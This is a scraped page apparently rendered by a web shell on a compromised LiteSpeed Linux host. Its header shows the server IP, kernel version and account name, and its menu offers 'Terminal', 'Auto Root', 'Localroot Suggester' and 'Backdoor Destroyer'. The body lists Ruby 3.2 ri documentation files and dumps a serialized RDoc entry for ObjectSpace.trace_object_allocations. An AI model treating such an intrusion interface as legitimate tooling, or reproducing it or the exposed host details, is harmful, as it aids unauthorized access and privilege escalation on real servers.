Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.198
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby32 /
share /
ri /
system /
ObjectSpace /
Delete
Unzip
Name
Size
Permission
Date
Action
InternalObjectWrapper
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
WeakMap
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
allocation_class_path-c.ri
809
B
-rw-r--r--
2026-04-07 17:42
allocation_generation-c.ri
871
B
-rw-r--r--
2026-04-07 17:42
allocation_method_id-c.ri
862
B
-rw-r--r--
2026-04-07 17:42
allocation_sourcefile-c.ri
533
B
-rw-r--r--
2026-04-07 17:42
allocation_sourceline-c.ri
545
B
-rw-r--r--
2026-04-07 17:42
cdesc-ObjectSpace.ri
3.16
KB
-rw-r--r--
2026-04-07 17:42
count_imemo_objects-c.ri
1.13
KB
-rw-r--r--
2026-04-07 17:42
count_nodes-c.ri
1020
B
-rw-r--r--
2026-04-07 17:42
count_objects-c.ri
1.28
KB
-rw-r--r--
2026-04-07 17:42
count_objects_size-c.ri
1.09
KB
-rw-r--r--
2026-04-07 17:42
count_symbols-c.ri
1.33
KB
-rw-r--r--
2026-04-07 17:42
count_tdata_objects-c.ri
1.54
KB
-rw-r--r--
2026-04-07 17:42
define_finalizer-c.ri
2.49
KB
-rw-r--r--
2026-04-07 17:42
dump-i.ri
834
B
-rw-r--r--
2026-04-07 17:42
dump_all-i.ri
2.3
KB
-rw-r--r--
2026-04-07 17:42
dump_shapes-i.ri
1.2
KB
-rw-r--r--
2026-04-07 17:42
each_object-c.ri
1.5
KB
-rw-r--r--
2026-04-07 17:42
garbage_collect-c.ri
309
B
-rw-r--r--
2026-04-07 17:42
garbage_collect-i.ri
308
B
-rw-r--r--
2026-04-07 17:42
internal_class_of-c.ri
679
B
-rw-r--r--
2026-04-07 17:42
internal_super_of-c.ri
703
B
-rw-r--r--
2026-04-07 17:42
memsize_of-c.ri
761
B
-rw-r--r--
2026-04-07 17:42
memsize_of_all-c.ri
1.21
KB
-rw-r--r--
2026-04-07 17:42
reachable_objects_from-c.ri
1.99
KB
-rw-r--r--
2026-04-07 17:42
reachable_objects_from_root-c.ri
535
B
-rw-r--r--
2026-04-07 17:42
trace_object_allocations-c.ri
1.13
KB
-rw-r--r--
2026-04-07 17:42
trace_object_allocations_clear-c.ri
413
B
-rw-r--r--
2026-04-07 17:42
trace_object_allocations_debug_start-c.ri
315
B
-rw-r--r--
2026-04-07 17:42
trace_object_allocations_start-c.ri
412
B
-rw-r--r--
2026-04-07 17:42
trace_object_allocations_stop-c.ri
598
B
-rw-r--r--
2026-04-07 17:42
undefine_finalizer-c.ri
374
B
-rw-r--r--
2026-04-07 17:42
Save
Rename
U:RDoc::AnyMethod[iI"trace_object_allocations:ETI"*ObjectSpace::trace_object_allocations;TT:privateo:RDoc::Markup::Document:@parts[ o:RDoc::Markup::Paragraph; [I"MStarts tracing object allocations from the ObjectSpace extension module.;To:RDoc::Markup::BlankLine o; ; [I"For example:;T@o:RDoc::Markup::Verbatim; [I"require 'objspace' ;TI" ;TI" class C ;TI" include ObjectSpace ;TI" ;TI" def foo ;TI"% trace_object_allocations do ;TI" obj = Object.new ;TI"K p "#{allocation_sourcefile(obj)}:#{allocation_sourceline(obj)}" ;TI" end ;TI" end ;TI" end ;TI" ;TI"#C.new.foo #=> "objtrace.rb:8" ;T:@format0o; ; [I"QThis example has included the ObjectSpace module to make it easier to read, ;TI"Pbut you can also use the ::trace_object_allocations notation (recommended).;T@o; ; [I"LNote that this feature introduces a huge performance decrease and huge ;TI"memory consumption.;T: @fileI""ext/objspace/object_tracing.c;T:0@omit_headings_from_table_of_contents_below0I"(trace_object_allocations { block } ;T0[ I"();T@*FI"ObjectSpace;TcRDoc::NormalModule00